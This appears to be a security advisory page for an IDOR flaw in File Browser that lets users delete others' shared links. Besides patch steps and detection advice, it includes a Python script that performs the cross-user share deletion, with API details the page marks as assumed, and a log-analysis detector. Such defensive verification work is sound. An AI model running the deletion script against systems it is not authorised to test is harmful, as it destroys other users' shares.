CVE-2025-64523
📋 TL;DR
This CVE describes an Insecure Direct Object Reference (IDOR) vulnerability in File Browser versions before 2.45.1. Any authenticated user with share permissions can delete other users' shared links without proper authorization checks. This affects organizations using File Browser for collaborative file sharing and management.
💻 Affected Systems
- File Browser
📦 What is this software?
File Browser (filebrowser/filebrowser on GitHub) is a self-hosted web file manager written in Go. It serves a directory tree through a browser UI and a JSON API, with per-user permissions (including a separate share permission) and shareable links to files and folders; those shared links are the objects affected by this CVE.
⚠️ Risk & Real-World Impact
Worst Case
Malicious actors systematically delete all shared links, causing complete disruption of file sharing operations, data loss in collaborative environments, and breach of confidentiality agreements.
Likely Case
Disgruntled or malicious users delete shared links they shouldn't have access to, disrupting specific projects or collaborations and causing operational delays.
If Mitigated
With proper access controls and monitoring, impact is limited to isolated incidents that can be quickly detected and restored from backups.
🎯 Exploit Status
Exploitation requires an authenticated account with share permission but is technically simple: the attacker sends a share-deletion request that names a share identifier they do not own, and versions before 2.45.1 remove it without checking ownership. No special tools or skills are required beyond basic HTTP request manipulation.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.45.1
Vendor Advisory: https://github.com/filebrowser/filebrowser/security/advisories/GHSA-6cqf-cfhv-659g
Restart Required: Yes
Instructions:
1. Backup your File Browser configuration and data
2. Stop the File Browser service
3. Update to version 2.45.1 or later using your package manager or manual installation
4. Restart the File Browser service
5. Verify the update was successful
🔧 Temporary Workarounds
Restrict Share Permissions
Temporarily limit which users have share permissions to reduce the attack surface.
# Edit File Browser configuration to restrict share permissions
# See documentation at https://filebrowser.org/configuration/permissions
Implement API Rate Limiting
Add rate limiting to share deletion endpoints to limit the damage from automated attacks. This slows bulk deletion but does not stop a single cross-user deletion, so it is not a substitute for the patch.
# Configure rate limiting via reverse proxy (nginx example).
# http{} context: only DELETE requests get a non-empty key, so listing and creating shares are not throttled.
map $request_method $share_delete_key { DELETE $binary_remote_addr; default ""; }
limit_req_zone $share_delete_key zone=share_limit:10m rate=2r/m;
# server{} context: File Browser's share routes live under /api/share/ (the path used in the log indicators below).
location /api/share/ {
    limit_req zone=share_limit burst=5 nodelay;
    proxy_pass http://filebrowser:8080;
}
🧯 If You Can't Patch
- Implement strict access controls and audit all users with share permissions
- Enable detailed logging of all share deletion activities and implement real-time monitoring
🔍 How to Verify
Check if Vulnerable:
Check File Browser version. If version is below 2.45.1, the system is vulnerable.
Check Version:
filebrowser version
Verify Fix Applied:
After updating, verify version is 2.45.1 or higher and test that users cannot delete shares they don't own.
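The following script is an added example, not part of the advisory or of the File Browser project, that automates the check above and the request manipulation described under Exploit Status: it creates a share as user A and tries to delete it as user B. It assumes (not confirmed by this page) that File Browser's API accepts a JSON POST to /api/login and returns the JWT as the response body, expects that token in an X-Auth header, creates a share with POST /api/share/<path> returning JSON containing "hash", and deletes it with DELETE /api/share/<hash>. Both accounts must have share permission, and A must be able to read the path being shared. The version-string parser assumes the usual "vMAJOR.MINOR.PATCH" form in the output of `filebrowser version`.

```python
"""Check whether a File Browser instance still lets user B delete user A's share.

Assumptions (not from the advisory): JSON POST /api/login returns a JWT in the
body; X-Auth carries it; POST /api/share/<path> returns JSON with "hash";
DELETE /api/share/<hash> removes the share.
"""
import json
import re
import sys
import urllib.error
import urllib.request

FIXED = (2, 45, 1)  # first version with the ownership check


def parse_version(text: str):
    """Extract MAJOR.MINOR.PATCH from e.g. 'File Browser v2.44.0/abc123' (assumed format)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version found in {text!r}")
    return tuple(int(x) for x in m.groups())


def version_is_vulnerable(text: str) -> bool:
    """True when the reported version is older than 2.45.1."""
    return parse_version(text) < FIXED


def classify_cross_user_delete(status: int) -> str:
    """Map the HTTP status of B's DELETE of A's share to a verdict."""
    if status in (200, 204):
        return "VULNERABLE: share owned by another user was deleted"
    if status in (401, 403):
        return "FIXED: cross-user deletion rejected"
    if status == 404:
        return "INCONCLUSIVE: share not found (check the hash)"
    return f"INCONCLUSIVE: unexpected status {status}"


def _call(base, method, path, token=None, body=None):
    """Minimal JSON client; returns (status, body) and never raises on HTTP errors."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(base + path, data=data, method=method)
    req.add_header("Content-Type", "application/json")
    if token:
        req.add_header("X-Auth", token)  # assumed header name
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode()


def login(base, user, pw):
    status, body = _call(base, "POST", "/api/login", body={"username": user, "password": pw})
    if status != 200:
        raise RuntimeError(f"login failed for {user}: {status}")
    return body.strip()  # assumed: token is the raw response body


def check(base, user_a, pw_a, user_b, pw_b, share_path="/"):
    """Create a share as A, attempt to delete it as B, return a verdict string."""
    tok_a = login(base, user_a, pw_a)
    tok_b = login(base, user_b, pw_b)
    status, body = _call(base, "POST", "/api/share" + share_path, token=tok_a, body={})
    if status != 200:
        raise RuntimeError(f"share creation as {user_a} failed: {status} {body}")
    share_hash = json.loads(body)["hash"]
    status, _ = _call(base, "DELETE", "/api/share/" + share_hash, token=tok_b)
    verdict = classify_cross_user_delete(status)
    # Clean up as the owner; a 404 here just means B already removed it.
    _call(base, "DELETE", "/api/share/" + share_hash, token=tok_a)
    return verdict


if __name__ == "__main__":
    if len(sys.argv) != 6:
        sys.exit("usage: check_idor.py BASE_URL USER_A PASS_A USER_B PASS_B")
    print(check(*sys.argv[1:]))
```

Run it against a test instance only, with two throwaway accounts; on a patched 2.45.1 or later server the cross-user DELETE should be rejected and the verdict starts with "FIXED".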
📡 Detection & Monitoring
Log Indicators:
- Multiple DELETE requests to /api/share/ endpoints from single user
- Failed authorization attempts followed by successful share deletions
- Unusual patterns of share deletions outside normal business hours
Network Indicators:
- HTTP DELETE requests to share endpoints that reference share identifiers owned by a user other than the authenticated requester (the request itself carries only the share identifier, so this requires correlating it with the owner recorded by File Browser)
- Rapid sequence of share deletion API calls
SIEM Query:
source="filebrowser.log" AND (method="DELETE" AND uri="/api/share/*") | stats count by user, uri
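For sites without a SIEM, the script below is an added example (not from the advisory or the project) that applies the first and third log indicators above to reverse-proxy access logs: it flags users with a burst of successful share deletions inside a short window and lists deletions outside business hours. The log lines and their format are constructed for this example; it assumes the proxy records an authenticated user column, and if yours logs only client IPs, key on the IP instead.

```python
"""Flag bursts and after-hours share deletions in proxy access logs.

Sample lines are constructed for this example. Assumed line format:
<ip> <user> [<time_local>] "<method> <uri> <proto>" <status>
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r'^(?P<ip>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: one normal deletion by alice, a burst of four by mallory at night.
SAMPLE_LOG = """\
10.0.0.5 alice [12/Nov/2025:09:14:02 +0000] "GET /api/shares HTTP/1.1" 200
10.0.0.9 mallory [12/Nov/2025:23:40:01 +0000] "DELETE /api/share/3fK9x HTTP/1.1" 200
10.0.0.9 mallory [12/Nov/2025:23:40:02 +0000] "DELETE /api/share/Qp2Lm HTTP/1.1" 200
10.0.0.9 mallory [12/Nov/2025:23:40:03 +0000] "DELETE /api/share/Zz81a HTTP/1.1" 200
10.0.0.9 mallory [12/Nov/2025:23:40:04 +0000] "DELETE /api/share/Hh7tq HTTP/1.1" 200
10.0.0.5 alice [12/Nov/2025:09:20:11 +0000] "DELETE /api/share/Vb4rn HTTP/1.1" 200
10.0.0.7 bob [12/Nov/2025:10:05:30 +0000] "POST /api/share/docs/report.pdf HTTP/1.1" 200
"""


def parse(lines):
    """Yield dicts for lines matching the assumed format; skip anything else."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            d = m.groupdict()
            d["ts"] = datetime.strptime(d["ts"], TS_FMT)
            d["status"] = int(d["status"])
            yield d


def share_deletions(events):
    """Successful DELETEs under /api/share/ (the share endpoints named in the indicators)."""
    return [
        e for e in events
        if e["method"] == "DELETE" and e["uri"].startswith("/api/share/") and e["status"] < 400
    ]


def burst_actors(events, window=timedelta(minutes=5), threshold=3):
    """Users with more than `threshold` share deletions inside any `window` (sliding)."""
    by_user = defaultdict(list)
    for e in share_deletions(events):
        by_user[e["user"]].append(e["ts"])
    flagged = {}
    for user, times in by_user.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 > threshold:
                flagged[user] = end - start + 1
                break
    return flagged


def after_hours(events, start_hour=8, end_hour=18):
    """(user, uri) for share deletions outside an assumed 08:00-18:00 UTC business window."""
    return [
        (e["user"], e["uri"]) for e in share_deletions(events)
        if not start_hour <= e["ts"].hour < end_hour
    ]


if __name__ == "__main__":
    evs = list(parse(SAMPLE_LOG.splitlines()))
    print("burst deleters:", burst_actors(evs))
    print("after-hours deletions:", after_hours(evs))
```

On the sample, mallory is reported as a burst deleter with four deletions in under five seconds, and all four also land in the after-hours list; alice's single daytime deletion is not flagged. Tune the window and threshold to the share churn you actually see before wiring this into an alert.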